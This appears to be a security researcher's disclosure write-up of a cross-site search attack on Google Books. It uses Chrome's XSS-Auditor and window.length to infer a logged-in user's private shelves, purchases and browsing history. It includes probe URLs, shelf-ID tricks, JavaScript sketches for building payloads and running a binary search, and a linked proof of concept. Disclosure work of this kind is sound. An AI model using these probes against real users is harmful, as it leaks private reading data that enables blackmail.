Google Books leakage

Summary

Leaking a user’s private data, such as purchased books, book browsing history, and private bookshelves, from the Google Books website by abusing the XSS-Auditor and window.length.

Introduction

Recently, I have been looking for XS-Search [1] vulnerabilities all over Google. While testing Google Books, I discovered that the page source changes slightly depending on the search results. This looked like a good entry point for an XS-Search attack, and indeed, by abusing the XSS-Auditor, I managed to exfiltrate a user’s private information through a prepared website.

When inspecting the page source, I noticed that a specific piece of JavaScript is inserted when at least one book is shown in the search results, and that it is absent otherwise. The code starts with:
<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"<title>"
where <title> is the book title of the first record.

For a given <title> and the user’s <uid>, I was able to create the payload https://books.google.com/books?uid=<uid>&num=1&q=<title>&x=<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"<title>". If the query &q=<title> returns a record, the page is blocked by the XSS-Auditor (because it detects the “reflected” parameter x as XSS); otherwise, the page loads normally.
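
To make the shape of this probe URL concrete, here is a minimal sketch of how it could be assembled. The helper names buildPayload and buildProbeUrl are hypothetical, and the sketch assumes that the title appears in the page exactly as typed and that percent-encoding the parameters does not stop the Auditor from matching them.

```javascript
// Prefix of the inline script emitted for the first search result
// (copied from the text above; the title is appended by buildPayload).
const SCRIPT_PREFIX =
  `<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"`;

// Hypothetical helper: the "reflected" payload for one candidate title.
// Assumption: the title is embedded in the page exactly as given here.
function buildPayload(title) {
  return `${SCRIPT_PREFIX}${title}"`;
}

// Hypothetical helper: the probe URL for a known uid and one candidate title.
function buildProbeUrl(uid, title) {
  const query = [
    `uid=${encodeURIComponent(uid)}`,
    "num=1", // only the first record matters
    `q=${encodeURIComponent(title)}`,
    `x=${encodeURIComponent(buildPayload(title))}`, // ignored by the server, seen by the Auditor
  ].join("&");
  return `https://books.google.com/books?${query}`;
}
```

If the search for the title returns a record, the script prefix in x also appears in the response, which is the condition under which the Auditor blocks the page.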

Another observation I made is that when the page is blocked by the XSS-Auditor, window.length is equal to 0 (which means no iframes are embedded); otherwise, it quickly becomes greater than 0.
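
The check on window.length can be sketched as a small classifier plus a polling loop. The names classifyProbe and watchProbe, the polling interval, and the timeout are assumptions made for illustration; the write-up only states that a fixed amount of time is used.

```javascript
// Hypothetical classifier for one probe window.
//   lengthNow - current value of win.length (number of frames in the window)
//   elapsedMs - time since the navigation started
//   timeoutMs - assumed cut-off after which an empty window counts as blocked
function classifyProbe(lengthNow, elapsedMs, timeoutMs) {
  if (lengthNow > 0) return "loaded"; // frames appeared: the page was not blocked
  if (elapsedMs >= timeoutMs) return "blocked"; // still no frames: assume the Auditor blocked it
  return "pending"; // too early to tell
}

// Browser-side usage sketch: poll a window opened earlier with window.open().
// win.length stays readable even when the window is cross-origin.
function watchProbe(win, timeoutMs, onResult, pollMs = 50) {
  const started = Date.now();
  const timer = setInterval(() => {
    const verdict = classifyProbe(win.length, Date.now() - started, timeoutMs);
    if (verdict !== "pending") {
      clearInterval(timer);
      onResult(verdict);
    }
  }, pollMs);
}
```

A timeout that is too short produces false "blocked" verdicts on slow connections, so the value has to be tuned to how quickly the results page normally embeds its frames.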

These observations allow the attacker to take a list of book titles and determine, for each one, whether the victim has ever “touched” that title. In the next sections, I will demonstrate a much more advanced attack that exfiltrates more detailed information.

Going further – uid=vulnerability

The main downside of the attack presented in the previous section (#Introduction) is that the attacker has to know the victim’s <uid>, which narrows its reach considerably. To extend it, I decided to test a few things out. Those experiments led me to the following observations:

https://books.google.com/books?uid=vulnerability - infinitely redirects to itself.
https://books.google.com/books?uid=%2B - redirects to https://books.google.com/books?uid=<uid>&hl=en.
https://books.google.com/books?uid=%2B1 - returns a 404 response.
https://books.google.com/books?uid=1%2B1 - redirects to https://books.google.com/books?uid=<uid>&hl=en.
https://books.google.com/books?uid='&q=hack - redirects to https://www.google.com/search?tbo=p&tbm=bks&q=hack.
https://books.google.com/books?uid=vulnerability&q=hack - displays results for the logged-in user without changing the URL.

The behavior is very strange, but the last observation allows the attacker to perform the XS-Search attack without knowing the victim’s <uid>.

Efficient attack

Thanks to #Going further – uid=vulnerability, the attack already reaches much further, but we are not done yet.

To begin this section, it’s important to mention that the results can be limited to one record by setting the query parameter num=1 and can be read at any offset with the help of start=<offset>. This allows searching through the library one title after another.

Also, by knowing the <id> of a specific shelf, we can limit the results to records from that shelf by setting the parameter as_coll=<id>. The default bookshelves have their <id> in the range [0, 10] (e.g. Browsing History has as_coll=9), and the custom ones are numbered incrementally, starting with as_coll=1001. This allows the attacker to explore the victim’s private bookshelves.
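
As an illustration of how num, start and as_coll combine, the following sketch builds the URL for the record at one offset of one shelf. The function names are hypothetical, and uid=vulnerability is used as the placeholder value from the previous section.

```javascript
// Hypothetical helper: URL showing exactly one record (num=1) at a given
// offset (start) of a given shelf (as_coll), for whoever is logged in.
function buildShelfUrl(shelfId, offset, uid = "vulnerability") {
  const params = new URLSearchParams({
    uid, // placeholder value; the results are those of the logged-in user
    as_coll: String(shelfId), // e.g. 9 for Browsing History, 1001 for the first custom shelf
    num: "1",
    start: String(offset),
  });
  return `https://books.google.com/books?${params}`;
}

// Hypothetical helper: one URL per record for the first `count` offsets of a shelf.
function shelfUrls(shelfId, count) {
  return Array.from({ length: count }, (_, offset) => buildShelfUrl(shelfId, offset));
}
```

For example, shelfUrls(9, 3) yields the URLs for offsets 0, 1 and 2 of the Browsing History shelf, each showing a single record.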

Another key observation is that the attacker doesn’t have to brute-force queries title by title. The XSS-Auditor can be tricked by providing multiple “reflected” payloads in one parameter, ?x=<payload1><payload2><payload3>.., where the page is blocked if at least one <payloadN> matches the resulting code. Because of this, the attacker can quickly find a match using an algorithm such as binary search. The only obstacle is the URL length limit imposed by the server, which can be easily bypassed by using the URL fragment #x=.. instead of the query ?x=... This works because the fragment #x= is not sent to the server, and there is a bug in the XSS-Auditor [2] that makes the Auditor search for reflections in URL fragments as well. It also seems that the length of the fragment is pretty much unlimited: I successfully injected 500k characters.
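
The binary search over candidate titles can be sketched as follows. The oracle matchesAny is a hypothetical stand-in for "load the page with the payloads of these titles and report whether it was blocked"; it is synchronous here only to keep the sketch short, while a real probe would be asynchronous. The sketch also assumes that exactly one title can match, which holds when num=1 limits the page to a single record.

```javascript
// Finds the single matching title among `candidates`, or returns null.
//   matchesAny(titles) - hypothetical oracle: true when at least one of the
//                        given titles matches the record shown on the page.
function findTitle(candidates, matchesAny) {
  // One query over the whole list tells us whether the title is there at all.
  if (candidates.length === 0 || !matchesAny(candidates)) return null;

  let pool = candidates;
  while (pool.length > 1) {
    const mid = Math.ceil(pool.length / 2);
    const left = pool.slice(0, mid);
    // Keep whichever half contains the match.
    pool = matchesAny(left) ? left : pool.slice(mid);
  }
  return pool[0];
}
```

With n candidate titles this needs about log2(n) + 1 page loads instead of up to n, which is why combining many payloads in one request matters so much.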

Combining all the presented observations allows the attacker to obtain detailed information about the victim in an extremely efficient way.

Attack scenario

A regular user of Google Books can have their private information leaked when visiting a prepared website. The leaked information includes items such as Searched Books, Private Book Collections, Purchased Books, etc. The attacker can use this information to embarrass, blackmail, or threaten the victim, or even to expose the victim to legal consequences, because certain books are banned in some countries (https://en.wikipedia.org/wiki/List_of_books_banned_by_governments).

Setup

I have created a proof of concept at https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/poc.html, but to make it fully work you will need:

A Chromium-based browser with the XSS-Auditor enabled
Two new shelves, S1 and S2, together with their <id> values (bookshelves can be created in My Library at https://books.google.com/books?uid=<uid>&hl=en; the <id> can be read from the as_coll=<id> parameter in the URL after visiting the created shelf)
One book in S1 chosen from https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/urls.html
Five books in S2 chosen from https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/urls.html

Tested on the newest Google Chrome: Version 71.0.3578.98 (Official Build) (64-bit)

Steps to reproduce

Visit https://terjanq.github.io/Bug-Bounty/Google/books-xs-search-enpgws9jw5mb/poc.html and click anywhere on the website.
Choose an option and fill in the required fields with the information obtained from #Setup
Wait for the results

Behind the scenes

Upon visiting the website and performing an action, a new window is opened. That window is used for the subsequent redirections.
Upon choosing an option:
2a. Have I touched that title?
- a request to https://books.google.com/books?uid=vuln&num=1&q=<title>&x=<xss> is made in the background, where <xss> is the payload described in #Introduction
- the script watches window.length for a change: if it changes to 1, the <title> was not found in the victim’s library. Otherwise, after a fixed amount of time, the script concludes that the page was blocked by the Auditor and hence that the <title> was found.
2b. What ONE title have I chosen?
- a binary search runs in the background: in each round the list of candidate titles is halved, keeping the half that contains the chosen title. The request URL is https://books.google.com/books?uid=vuln&as_coll=<id>&num=1&start=<offset>#x=<xss>.
2c. What FIVE titles have I chosen?
- same as 2a but repeated 5 times.
Results are displayed.
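
For option 2b, the request sent in one round of the search can be sketched as below: the payloads for one half of the candidate titles are concatenated and placed in the URL fragment. The function name buildRoundUrl is hypothetical, and percent-encoding the fragment is an assumption; the write-up does not say how the payloads were encoded.

```javascript
// Prefix of the inline script emitted for the first result (from #Introduction).
const SCRIPT_PREFIX =
  `<script>if (window['_OC_registerHover']){_OC_registerHover({"title":"`;

// Hypothetical helper: URL for one binary-search round against one shelf record.
//   shelfId - the as_coll value of the shelf
//   offset  - which record of the shelf to test (start)
//   titles  - the half of the candidate list tested in this round
function buildRoundUrl(shelfId, offset, titles) {
  // One payload per title, simply concatenated: a single match is enough
  // for the Auditor to block the page.
  const payloads = titles.map((title) => `${SCRIPT_PREFIX}${title}"`).join("");
  const query = `uid=vuln&as_coll=${shelfId}&num=1&start=${offset}`;
  // The fragment is never sent to the server, so its length is not limited by it.
  // Assumption: the Auditor matches the fragment after percent-decoding.
  return `https://books.google.com/books?${query}#x=${encodeURIComponent(payloads)}`;
}
```

Each round opens one such URL, waits for the window.length verdict, and keeps the half of the list indicated by that verdict.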